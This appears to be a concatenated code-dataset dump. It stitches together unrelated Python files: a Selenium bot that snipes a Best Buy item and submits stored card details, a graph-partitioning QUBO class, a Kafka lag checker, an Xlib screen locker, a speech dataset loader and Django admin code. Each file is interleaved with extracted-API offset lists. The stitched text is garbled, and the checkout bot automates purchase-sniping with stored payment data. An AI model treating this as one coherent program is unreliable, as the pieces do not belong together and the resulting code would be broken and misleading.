# ENTER EMAIL
wait.until(ec.presence_of_element_located((By.ID, "fld-e")))
email_address_el = driver.find_element_by_id("fld-e")
word_entry(email_address_el, account.check_files_2()['Login Email'])
print("***Entered Email***")
#
# ENTER PASSWORD
wait.until(ec.presence_of_element_located((By.ID, "fld-p1")))
email_password_el = driver.find_element_by_id("fld-p1")
word_entry(email_password_el, account.check_files_2()['Login Pass'])
print("***Entered Password***")
#
survey()
# SUBMIT
wait.until(ec.element_to_be_clickable((By.CSS_SELECTOR, '.c-button-secondary')))
driver.find_element_by_css_selector('.c-button-secondary').click()
print("***Logged In***")
#
survey()
# CHECKING ADD TO CART
i = 0
sleep(5)
buy_button = True
while buy_button:
sleep(0.5)
print(' Checking {}'.format(i))
survey()
try:
driver.find_element_by_class_name(".c-button-disabled")
print('Sold Out')
i += 1
if i % 100 == 0:
driver.refresh()
print('Refreshed')
if i == 1000:
i = 0
except:
add_button = driver.find_element_by_class_name(".c-button-primary")
sleep(0.8)
add_button.click()
buy_button = False
spinner_check()
print("***Found add to cart***")
print('Checking for second button...Waiting Up to 25min ')
WebDriverWait(driver, 1500).until(ec.element_to_be_clickable((By.CLASS_NAME, ".c-button-primary")))
driver.find_element_by_class_name('btn-primary').click()
print('Clicked second Add To Cart')
sleep(1)
driver.get("https://www.bestbuy.com/cart")
print("***Loading Cart***")
# Selects store pickup
spinner_check()
wait.until(ec.element_to_be_clickable((By.XPATH,
'/html/body/div[1]/main/div/div[2]/div[1]/'
'div/div[1]/div[1]/section[1]/div[4]/ul/li/'
'section/div[2]/div[2]/form/div[2]/fieldset/'
'div[1]/div[1]/div/div/div/input')))
driver.find_element_by_xpath('/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]'
'/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]'
'/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input').click()
wait.until(ec.element_to_be_clickable((By.CLASS_NAME, ".c-button-primary")))
driver.find_element_by_xpath("/html/body").click()
ship = driver.find_element_by_class_name(".c-button-primary")
driver.execute_script("arguments[0].scrollIntoView(true);", ship)
ship.click()
print("***Checkout Button Hit***")
# INFORMATION FOR SHOPPING CART
wait.until(ec.element_to_be_clickable((By.XPATH,
'/html/body/div[1]/div[2]/div/'
'div[2]/div[1]/div[1]/main/div[2]'
'/div[2]/form/section/div/div[2]/'
'div/div/button')))
driver.find_element_by_xpath('/html/body/div[1]/div[2]/div/div[2]'
'/div[1]/div[1]/main/div[2]/div[2]/form/section/'
'div/div[2]/div/div/button').click()
sleep(0.5)
wait.until(ec.presence_of_element_located((By.ID, 'optimized-cc-card-number')))
card = driver.find_element_by_id('optimized-cc-card-number')
word_entry(card, account.check_files_2()['Card Number'])
# ADDRESS
wait.until(ec.presence_of_element_located((By.ID, 'payment.billingAddress.street')))
address = driver.find_element_by_id('payment.billingAddress.street')
word_entry(address, account.check_files_2()['Address'])
print("**Added Street Address**")
# FIRST NAME
first_name = driver.find_element_by_id('payment.billingAddress.firstName')
word_entry(first_name, account.check_files_2()['First Name'])
print("**Added First Name**")
# LAST NAME
last_name = driver.find_element_by_id('payment.billingAddress.lastName')
word_entry(last_name, account.check_files_2()['Last Name'])
print("**Added Last Name**")
# CITY
city = driver.find_element_by_id('payment.billingAddress.city')
word_entry(city, account.check_files_2()['City'])
print("**Added City**")
# ZIP CODE
city_zip_code = driver.find_element_by_id('payment.billingAddress.zipcode')
word_entry(city_zip_code, account.check_files_2()['ZipCode'])
print("**Added ZipCode**")
# SELECT STATE
driver.find_element_by_id('payment.billingAddress.state').send_keys('CC')
print("**Selected State**")
# BUTTON TO CONTINUE
security = driver.find_element_by_id('credit-card-cvv')
word_entry(security, account.check_files_2()['Card CVV 3 Digits'])
month = Select(driver.find_element_by_xpath("/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]"
"/main/div[2]/div[3]/div/section/div[1]/div/section"
"/div[2]/div[1]/div/div[1]/label/div/div/select"))
month.select_by_value(account.check_files_2()['Card Expire Month'])
year = Select(driver.find_element_by_xpath("/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]"
"/main/div[2]/div[3]/div/section/div[1]/div/section"
"/div[2]/div[1]/div/div[2]/label/div/div/select"))
year.select_by_value(account.check_files_2()['Card Expire Year'])
place_order = driver.find_element_by_xpath('/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]'
'/main/div[2]/div[3]/div/section/div[4]/button')
place_order.click()
print('Purchase Completed! Thank you for using this code!')
| [
"selenium.webdriver.firefox.firefox_profile.FirefoxProfile",
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.support.expected_conditions.invisibility_of_element_located",
"account.check_files_2",
"selenium.webdriver.Firefox",
"time.sleep",
"selenium.webdriver.firefox.options.Options",... | [((514, 523), 'selenium.webdriver.firefox.options.Options', 'Options', ([], {}), '()\n', (521, 523), False, 'from selenium.webdriver.firefox.options import Options\n'), ((564, 580), 'selenium.webdriver.firefox.firefox_profile.FirefoxProfile', 'FirefoxProfile', ([], {}), '()\n', (578, 580), False, 'from selenium.webdriver.firefox.firefox_profile import FirefoxProfile\n'), ((640, 694), 'selenium.webdriver.Firefox', 'webdriver.Firefox', ([], {'firefox_profile': 'fp', 'options': 'options'}), '(firefox_profile=fp, options=options)\n', (657, 694), False, 'from selenium import webdriver\n'), ((707, 732), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(20)'], {}), '(driver, 20)\n', (720, 732), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((2090, 2098), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (2095, 2098), False, 'from time import sleep\n'), ((3389, 3397), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (3394, 3397), False, 'from time import sleep\n'), ((4334, 4342), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (4339, 4342), False, 'from time import sleep\n'), ((6115, 6125), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (6120, 6125), False, 'from time import sleep\n'), ((2163, 2227), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CSS_SELECTOR, '.account-button')"], {}), "((By.CSS_SELECTOR, '.account-button'))\n", (2189, 2227), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2393, 2458), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.CSS_SELECTOR, '.sign-in-btn')"], {}), "((By.CSS_SELECTOR, '.sign-in-btn'))\n", (2423, 2458), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2610, 2658), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'fld-e')"], {}), "((By.ID, 'fld-e'))\n", (2640, 2658), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2874, 2923), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'fld-p1')"], {}), "((By.ID, 'fld-p1'))\n", (2904, 2923), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3150, 3218), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CSS_SELECTOR, '.c-button-secondary')"], {}), "((By.CSS_SELECTOR, '.c-button-secondary'))\n", (3176, 3218), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3453, 3463), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (3458, 3463), False, 'from time import sleep\n'), ((4160, 4224), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CLASS_NAME, '.c-button-primary')"], {}), "((By.CLASS_NAME, '.c-button-primary'))\n", (4186, 4224), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((4489, 4697), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.XPATH,\n '/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input'\n )"], {}), "((By.XPATH,\n '/html/body/div[1]/main/div/div[2]/div[1]/div/div[1]/div[1]/section[1]/div[4]/ul/li/section/div[2]/div[2]/form/div[2]/fieldset/div[1]/div[1]/div/div/div/input'\n ))\n", (4515, 4697), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((5172, 5236), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.CLASS_NAME, '.c-button-primary')"], {}), "((By.CLASS_NAME, '.c-button-primary'))\n", (5198, 5236), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((5545, 5703), 'selenium.webdriver.support.expected_conditions.element_to_be_clickable', 'ec.element_to_be_clickable', (["(By.XPATH,\n '/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]/main/div[2]/div[2]/form/section/div/div[2]/div/div/button'\n )"], {}), "((By.XPATH,\n '/html/body/div[1]/div[2]/div/div[2]/div[1]/div[1]/main/div[2]/div[2]/form/section/div/div[2]/div/div/button'\n ))\n", (5571, 5703), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((6142, 6209), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'optimized-cc-card-number')"], {}), "((By.ID, 'optimized-cc-card-number'))\n", (6172, 6209), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((6372, 6444), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'ec.presence_of_element_located', (["(By.ID, 'payment.billingAddress.street')"], {}), "((By.ID, 'payment.billingAddress.street'))\n", (6402, 6444), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((2753, 2776), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (2774, 2776), False, 'import account\n'), ((3021, 3044), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (3042, 3044), False, 'import account\n'), ((4126, 4153), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(1500)'], {}), '(driver, 1500)\n', (4139, 4153), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((6299, 6322), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6320, 6322), False, 'import account\n'), ((6545, 6568), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6566, 6568), False, 'import account\n'), ((6748, 6771), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6769, 6771), False, 'import account\n'), ((6946, 6969), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (6967, 6969), False, 'import account\n'), ((7123, 7146), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7144, 7146), False, 'import account\n'), ((7315, 7338), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7336, 7338), False, 'import account\n'), ((7632, 7655), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (7653, 7655), False, 'import account\n'), ((8008, 8031), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (8029, 8031), False, 'import account\n'), ((8382, 8405), 'account.check_files_2', 'account.check_files_2', ([], {}), '()\n', (8403, 8405), False, 'import account\n'), ((1162, 1170), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (1167, 1170), False, 'from time import sleep\n'), ((1444, 1511), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'ec.invisibility_of_element_located', (["(By.CLASS_NAME, 'page-spinner')"], {}), "((By.CLASS_NAME, 'page-spinner'))\n", (1478, 1511), True, 'from selenium.webdriver.support import expected_conditions as ec\n'), ((3921, 3931), 'time.sleep', 'sleep', (['(0.8)'], {}), '(0.8)\n', (3926, 3931), False, 'from time import sleep\n'), ((1413, 1437), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['driver', '(4)'], {}), '(driver, 4)\n', (1426, 1437), False, 'from selenium.webdriver.support.ui import WebDriverWait\n')] |
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""_graph_partitioning.py.
Contains the GraphPartitioning class.
See ``help(qubovert.problems.GraphPartitioning)``.
"""
from qubovert.utils import QUSOMatrix
from qubovert import PCSO
from qubovert.problems import Problem
__all__ = 'GraphPartitioning',
class GraphPartitioning(Problem):
"""GraphPartitioning.
Class to manage converting (Weighted) Graph Partitioning to and from its
QUBO and QUSO formluations. Based on the paper "Ising formulations of many
NP problems", hereforth designated [Lucas].
The goal of the Graph Partitioning problem is to partition the verticies
of a graph into two equal subsets such that the number of edges (or the
total weight of the edges) connecting the two subsets is minimized.
GraphPartitioning inherits some methods and attributes from the Problem
class. See ``help(qubovert.problems.Problem)``.
Example
-------
>>> from qubovert.problems import GraphPartitioning
>>> from any_module import qubo_solver
>>> # or you can use my bruteforce solver...
>>> # from qubovert.utils import solve_qubo_bruteforce as qubo_solver
>>> edges = {("a", "b"), ("a", "c"), ("c", "d"),
("b", "c"), ("e", "f"), ("d", "e")}
>>> problem = GraphPartitioning(edges)
>>> Q = problem.to_qubo()
>>> obj, sol = qubo_solver(Q)
>>> solution = problem.convert_solution(sol)
>>> print(solution)
({'a', 'b', 'c'}, {'d', 'e', 'f'})
>>> print(problem.is_solution_valid(solution))
True
This is True since the number of vertices in the first partition is equal
to the number of vertices in the second partition.
>>> print(obj)
1
This is 1 because there is 1 edge connecting the partitions.
"""
def __init__(self, edges):
"""__init__.
The goal of the (Weighted) Graph Partitioning problem is to partition
the vertices of a graph into two equal subsets such that the number of
edges (or the total weight of the edges) connecting the two subsets is
minimized. All naming conventions follow the names in the paper
[Lucas].
Parameters
----------
edges : set or dict.
If edges is a set, then it must be a set of two element tuples
describing the edges of the graph. Ie each tuple is a connection
between two vertices. If a tuple has a repeated label (for example,
(2, 2)), it will be ignored.
If edges is a dict then the keys must be
two element tuples and the values are the weights associated with
that edge. If a key has a repeated label (for example, (2, 2)), it
will be ignored.
Examples
--------
>>> edges = {("a", "b"), ("a", "c")}
>>> problem = GraphPartitioning(edges)
>>> edges = {(0, 1), (0, 2)}
>>> problem = GraphPartitioning(edges)
>>> edges = {(0, 1): 2, (1, 2): -1}
>>> problem = GraphPartitioning(edges)
"""
if isinstance(edges, set):
self._edges = {k: 1 for k in edges if k[0] != k[1]}
else:
self._edges = {k: v for k, v in edges.items() if k[0] != k[1]}
self._vertices = {y for x in edges for y in x}
self._vertex_to_index = {x: i for i, x in enumerate(self._vertices)}
self._index_to_vertex = {i: x for x, i in
self._vertex_to_index.items()}
self._N = len(self._vertices)
all_degs = {}
for e in edges:
for q in e:
all_degs[q] = all_degs.setdefault(q, 0) + 1
self._degree = max(all_degs.values()) if all_degs else 0
@property
def E(self):
"""E.
A copy of the set of edges of the graph. Updating the copy will not
update the instance set.
Return
------
E : set of two element tuples.
A copy of the edge set defining the Graph Partitioning problem.
"""
return set(self._edges.keys())
@property
def V(self):
"""V.
A copy of the vertex set of the graph. Updating the copy will not
update the instance set.
Returns
-------
V : set.
A copy of the set of vertices corresponding to the edge set for the
Graph Partitioning problem.
"""
return self._vertices.copy()
@property
def weights(self):
"""weights.
Returns a dictionary mapping the edges of the graph to their associated
weights.
Return
------
weights : dict.
Keys are two element tuples, values are numbers.
"""
return self._edges.copy()
@property
def degree(self):
"""degree.
The maximum degree of the graph.
Returns
-------
deg : int.
A copy of the variable of the maximal degree of the graph.
"""
return self._degree
@property
def num_binary_variables(self):
"""num_binary_variables.
The number of binary variables that the QUBO and QUSO use.
Return
------
num : integer.
The number of variables in the QUBO/QUSO formulation.
"""
return self._N
def to_quso(self, A=None, B=1):
r"""to_quso.
Create and return the graph partitioning problem in QUSO form
following section 2.2 of [Lucas]. A and B are parameters to enforce
constraints.
It is formatted such that the solution to the QUSO formulation is
equal to the the total number of edges connecting the two
partitions (or the total weight if we are solving weighted
partitioning).
Parameters
----------
A: positive float (optional, defaults to None).
A enforces the constraints. If it is None, then A will be chosen
to enforce hard constraints (equation 10 in [Lucas]). Note that
this may not be optimal for a solver, often hard constraints result
in unsmooth energy landscapes that are difficult to minimize. Thus
it may be useful to play around with the magnitude of this value.
B: positive float (optional, defaults to 1).
Constant in front of the objective function to minimize. See
section 2.2 of [Lucas].
Return
------
L : qubovert.utils.QUSOMatrix object.
For most practical purposes, you can use QUSOMatrix in the
same way as an ordinary dictionary. For more information, see
``help(qubovert.utils.QUSOMatrix)``.
Example
-------
>>> problem = GraphPartitioning({(0, 1), (1, 2), (0, 3)})
>>> L = problem.to_quso()
"""
# all naming conventions follow the paper listed in the docstring
if A is None:
A = min(2*self._degree, self._N) * B / 8
L = QUSOMatrix()
# encode H_A (equation 8)
L += PCSO().add_constraint_eq_zero(
{(i,): 1 for i in range(self._N)}, lam=A)
# encode H_B (equation 9)
L += B * sum(self._edges.values()) / 2
for (u, v), w in self._edges.items():
L[(self._vertex_to_index[u],
self._vertex_to_index[v])] -= w * B / 2
return L
# slower because we convert to PCSO and then to QUSOMatrix
# H = PCSO()
# H.set_mapping(self._vertex_to_index)
# # encode H_A (equation 8)
# H.add_constraint_eq_zero({(i,): 1 for i in self._vertices}, lam=A)
# # encode H_B (equation 9)
# H += B * sum(self._edges.values()) / 2
# for e, w in self._edges.items():
# H[e] -= w * B / 2
# return H.to_quso()
def convert_solution(self, solution, spin=False):
"""convert_solution.
Convert the solution to the QUBO or QUSO to the solution to the
Graph Partitioning problem.
Parameters
----------
solution : iterable or dict.
The QUBO or QUSO solution output. The QUBO solution output
is either a list or tuple where indices specify the label of the
variable and the element specifies whether it's 0 or 1 for QUBO
(or 1 or -1 for QUSO), or it can be a dictionary that maps the
label of the variable to is value.
spin : bool (optional, defaults to False).
`spin` indicates whether ``solution`` is the solution to the
boolean {0, 1} formulation of the problem or the spin {1, -1}
formulation of the problem. This parameter usually does not matter,
and it will be ignored if possible. The only time it is used is if
``solution`` contains all 1's. In this case, it is unclear whether
``solution`` came from a spin or boolean formulation of the
problem, and we will figure it out based on the ``spin`` parameter.
Return
------
res: tuple of sets (partition1, partition2).
partition1 : set.
The first partition of verticies.
partition2 : set.
The second partition.
Example
-------
>>> edges = {("a", "b"), ("a", "c"), ("c", "d"),
("b", "c"), ("e", "f"), ("d", "e")}
>>> problem = GraphPartitioning(edges)
>>> Q = problem.to_qubo()
>>> obj, sol = solve_qubo(Q)
>>> print(problem.convert_solution(sol))
({'a', 'b', 'c'}, {'d', 'e', 'f'})
"""
if not isinstance(solution, dict):
solution = dict(enumerate(solution))
partition1 = set(
self._index_to_vertex[i] for i, v in solution.items() if v == 1
)
partition2 = set(
self._index_to_vertex[i] for i, v in solution.items() if v != 1
)
return partition1, partition2
def is_solution_valid(self, solution, spin=False):
"""is_solution_valid.
Returns whether or not the proposed solution has an equal number of
vertices in each partition. NOTE: this is impossible if the number of
edges is odd!
Parameters
----------
solution : iterable or dict.
solution can be the output of GraphPartitioning.convert_solution,
or the QUBO or QUSO solver output. The QUBO solution output
is either a list or tuple where indices specify the label of the
variable and the element specifies whether it's 0 or 1 for QUBO
(or 1 or -1 for QUSO), or it can be a dictionary that maps the
label of the variable to is value.
spin : bool (optional, defaults to False).
`spin` indicates whether ``solution`` is the solution to the
boolean {0, 1} formulation of the problem or the spin {1, -1}
formulation of the problem. This parameter usually does not matter,
and it will be ignored if possible. The only time it is used is if
``solution`` contains all 1's. In this case, it is unclear whether
``solution`` came from a spin or boolean formulation of the
problem, and we will figure it out based on the ``spin`` parameter.
Return
------
valid : boolean.
True if the proposed solution is valid, else False.
"""
not_converted = (
not isinstance(solution, tuple) or len(solution) != 2 or
not isinstance(solution[0], set) or
not isinstance(solution[1], set)
)
if not_converted:
solution = self.convert_solution(solution, spin)
return len(solution[0]) == len(solution[1])
| [
"qubovert.utils.QUSOMatrix",
"qubovert.PCSO"
] | [((7586, 7598), 'qubovert.utils.QUSOMatrix', 'QUSOMatrix', ([], {}), '()\n', (7596, 7598), False, 'from qubovert.utils import QUSOMatrix\n'), ((7647, 7653), 'qubovert.PCSO', 'PCSO', ([], {}), '()\n', (7651, 7653), False, 'from qubovert import PCSO\n')] |
#!/usr/bin/python
import requests
def check():
data = {}
consumers = requests.get('http://localhost:9000/consumers').json()
for consumer_group in consumers:
consumer_infos = requests.get(
'http://localhost:9000/consumers/{consumer_group}'.format(
consumer_group=consumer_group)).json()
for partition in consumer_infos['partition_assignment']:
data[
'{consumer_group}-{topic}-{partition}-lag'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['lag']
data[
'{consumer_group}-{topic}-{partition}-log_end_offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['log_end_offset']
data[
'{consumer_group}-{topic}-{partition}-offset'.format(
consumer_group=consumer_group,
topic=partition['topic'],
partition=partition['partition'])] = partition['offset']
print(data)
return data
if __name__ == "__main__":
check()
| [
"requests.get"
] | [((81, 128), 'requests.get', 'requests.get', (['"""http://localhost:9000/consumers"""'], {}), "('http://localhost:9000/consumers')\n", (93, 128), False, 'import requests\n')] |
from Xlib import X, display
def lock_screen(display: display.Display, screen_nb: int):
screen = display.screen(screen_nb)
root = screen.root
display_width = screen.width_in_pixels
display_height = screen.height_in_pixels
window = root.create_window(0, 0, display_width, display_height,
0, screen.root_depth, window_class=X.CopyFromParent,
visual=screen.root_visual,
override_redirect=1, background_pixel=screen.black_pixel)
pixmap = window.create_pixmap(8, 8, 1)
invisible_cursor = pixmap.create_cursor(pixmap, (0, 0, 0), (0, 0, 0), 0, 0)
window.change_attributes(cursor=invisible_cursor) # what XDefineCursor does under the hood
pointer_mask = X.ButtonPressMask | X.ButtonReleaseMask | X.PointerMotionMask
window.grab_pointer(False, event_mask=pointer_mask,
pointer_mode=X.GrabModeAsync, keyboard_mode=X.GrabModeAsync,
confine_to=X.NONE, cursor=invisible_cursor, time=X.CurrentTime)
window.grab_keyboard(True, pointer_mode=X.GrabModeAsync,
keyboard_mode=X.GrabModeAsync, time=X.CurrentTime)
window.map()
def lock(display: display.Display):
for screen in range(display.screen_count()):
lock_screen(display, screen)
display.sync()
| [
"Xlib.display.screen_count",
"Xlib.display.screen",
"Xlib.display.sync"
] | [((102, 127), 'Xlib.display.screen', 'display.screen', (['screen_nb'], {}), '(screen_nb)\n', (116, 127), False, 'from Xlib import X, display\n'), ((1356, 1370), 'Xlib.display.sync', 'display.sync', ([], {}), '()\n', (1368, 1370), False, 'from Xlib import X, display\n'), ((1290, 1312), 'Xlib.display.screen_count', 'display.screen_count', ([], {}), '()\n', (1310, 1312), False, 'from Xlib import X, display\n')] |
import torch
import torch.utils.data as data
from glob import glob
from os.path import join, basename, exists
import numpy as np
import pickle as pkl
from random import random
class KETTS76(data.Dataset):
def __init__(self, which_set='train', datapath='/home/thkim/data/KETTS76/bin_22050'):
# Load vocabulary
self.__dict__.update(locals())
vocab_path = datapath + '/vocab_dict.pkl'
self.vocab_dict = pkl.load(open(vocab_path, 'rb'))
self.vocab_size = len(self.vocab_dict)
self.num_spkr = 6
# Filelist
self.txtlist = np.sort(glob(datapath+'/*.txt'))
self.mellist = np.sort(glob(datapath+'/*.mel'))
if which_set == 'train':
self.txtlist = [xx for xx in self.txtlist if int(xx.split('_')[-1][:-4]) < 490]
self.mellist = [xx for xx in self.mellist if int(xx.split('_')[-1][:-4]) < 490]
elif which_set == 'val':
self.txtlist = [xx for xx in self.txtlist if int(xx.split('_')[-1][:-4]) >= 490]
self.mellist = [xx for xx in self.mellist if int(xx.split('_')[-1][:-4]) >= 490]
else:
raise ValueError
self.dbname = 'KETTS76'
self.gen_lu = {'f': 0, 'm': 1}
self.age_lu = {'age20': 0, 'age30': 1, 'age40': 2, 'age50': 3, 'age60': 4}
self.emo_lu = {'neu': 0, 'hap': 1, 'sad': 2, 'ang': 3, 'sur': 4, 'fea': 5, 'dis': 6}
self.spkr_dict = ['20m', '30f', '40m', '50m', '50f', '60f']
self.spkr_lu = {'_'.join((self.dbname, self.spkr_dict[ii])): xx for ii, xx in enumerate(range(self.num_spkr))}
assert len(self.txtlist)==len(self.mellist), \
'mellist({}) and txtlist({}) has different length'.format(len(self.mellist), len(self.txtlist))
self.char2onehot = lambda x : self.vocab_dict[x] if x in self.vocab_dict.keys() else None
def __len__(self):
return len(self.txtlist)
def __getitem__(self, idx):
# Text read
with open(self.txtlist[idx], 'r') as f:
txt = f.readline()
txt_feat = list(filter(None, [self.char2onehot(xx) for xx in txt]))
# Mel/Lin read
mellin = pkl.load(open(self.mellist[idx], 'rb'))
mel = mellin['mel']
#lin = mellin['lin']
target_mel_name = basename(self.mellist[idx])
spk, emo, _, _, sent_no = target_mel_name[:-4].split('_')
while True:
new_sent = np.random.randint(500)
style_mel_name = f'{spk}_{emo}_500_trim_{new_sent:05}.mel'
style_mel_path = join(self.datapath, style_mel_name)
if exists(style_mel_path):
break
while True:
new_emo = np.random.choice(list(self.emo_lu.keys()))
new_spk = np.random.choice(self.spkr_dict)
contents_mel_name = f'{new_spk}_{new_emo}_500_trim_{sent_no}.mel'
contents_mel_path = join(self.datapath, contents_mel_name)
if exists(contents_mel_path):
break
contents_mel = pkl.load(open(contents_mel_path, 'rb'))['mel']
style_mel = pkl.load(open(style_mel_path, 'rb'))['mel']
style = self.getstyle(self.txtlist[idx])
return {'txt': np.asarray(txt_feat),
'style': style,
#'target_lin': np.asarray(lin),
'target_mel': np.asarray(mel),
'style_mel': np.asarray(style_mel),
'contents_mel': np.asarray(contents_mel),
'filename': {'target':self.mellist[idx], 'style':style_mel_path, 'input':contents_mel_path}
}
def getstyle(self, filename):
filename = basename(filename)
spkr, emo = basename(filename).split('_')[:2]
gender = self.gen_lu[spkr[2]]
age = self.age_lu[f'age{spkr[:2]}']
emotion = self.emo_lu[emo]
spkr = self.spkr_lu['_'.join((self.dbname, spkr))]
return {'age': age, 'gender': gender,'emotion': emotion, 'dbname': self.dbname, 'spkr': spkr}
def get_vocab_size(self):
return self.vocab_size
def set_vocab_dict(self, vocab_dict):
self.vocab_dict = vocab_dict
self.vocab_size = len(vocab_dict)
self.char2onehot = lambda x : self.vocab_dict[x] if x in self.vocab_dict.keys() else None
def set_spkr_lu(self, spkr_lu):
self.spkr_lu = spkr_lu
if __name__=='__main__':
aa = KETTS76()
aa[0]
import ipdb
ipdb.set_trace()
| [
"os.path.exists",
"ipdb.set_trace",
"numpy.random.choice",
"os.path.join",
"numpy.asarray",
"numpy.random.randint",
"os.path.basename",
"glob.glob"
] | [((4439, 4455), 'ipdb.set_trace', 'ipdb.set_trace', ([], {}), '()\n', (4453, 4455), False, 'import ipdb\n'), ((2296, 2323), 'os.path.basename', 'basename', (['self.mellist[idx]'], {}), '(self.mellist[idx])\n', (2304, 2323), False, 'from os.path import join, basename, exists\n'), ((3660, 3678), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (3668, 3678), False, 'from os.path import join, basename, exists\n'), ((595, 620), 'glob.glob', 'glob', (["(datapath + '/*.txt')"], {}), "(datapath + '/*.txt')\n", (599, 620), False, 'from glob import glob\n'), ((651, 676), 'glob.glob', 'glob', (["(datapath + '/*.mel')"], {}), "(datapath + '/*.mel')\n", (655, 676), False, 'from glob import glob\n'), ((2436, 2458), 'numpy.random.randint', 'np.random.randint', (['(500)'], {}), '(500)\n', (2453, 2458), True, 'import numpy as np\n'), ((2559, 2594), 'os.path.join', 'join', (['self.datapath', 'style_mel_name'], {}), '(self.datapath, style_mel_name)\n', (2563, 2594), False, 'from os.path import join, basename, exists\n'), ((2610, 2632), 'os.path.exists', 'exists', (['style_mel_path'], {}), '(style_mel_path)\n', (2616, 2632), False, 'from os.path import join, basename, exists\n'), ((2764, 2796), 'numpy.random.choice', 'np.random.choice', (['self.spkr_dict'], {}), '(self.spkr_dict)\n', (2780, 2796), True, 'import numpy as np\n'), ((2907, 2945), 'os.path.join', 'join', (['self.datapath', 'contents_mel_name'], {}), '(self.datapath, contents_mel_name)\n', (2911, 2945), False, 'from os.path import join, basename, exists\n'), ((2961, 2986), 'os.path.exists', 'exists', (['contents_mel_path'], {}), '(contents_mel_path)\n', (2967, 2986), False, 'from os.path import join, basename, exists\n'), ((3218, 3238), 'numpy.asarray', 'np.asarray', (['txt_feat'], {}), '(txt_feat)\n', (3228, 3238), True, 'import numpy as np\n'), ((3353, 3368), 'numpy.asarray', 'np.asarray', (['mel'], {}), '(mel)\n', (3363, 3368), True, 'import numpy as np\n'), ((3399, 3420), 'numpy.asarray', 'np.asarray', (['style_mel'], {}), '(style_mel)\n', (3409, 3420), True, 'import numpy as np\n'), ((3454, 3478), 'numpy.asarray', 'np.asarray', (['contents_mel'], {}), '(contents_mel)\n', (3464, 3478), True, 'import numpy as np\n'), ((3699, 3717), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (3707, 3717), False, 'from os.path import join, basename, exists\n')] |
from django.contrib import admin
from .models import User, Category, Listing, WatchList, Bid, Comment
admin.site.register(User)
admin.site.register(Category)
admin.site.register(WatchList)
class ListingAdmin(admin.ModelAdmin):
list_display = ('title', 'username', 'price', 'status')
admin.site.register(Listing, ListingAdmin)
class CommentAdmin(admin.ModelAdmin):
list_display = ('listing', 'username', 'active')
admin.site.register(Comment, CommentAdmin)
class BidAdmin(admin.ModelAdmin):
list_display = ('listing', 'username', 'bidprice', 'bidstatus', 'completed')
admin.site.register(Bid, BidAdmin)
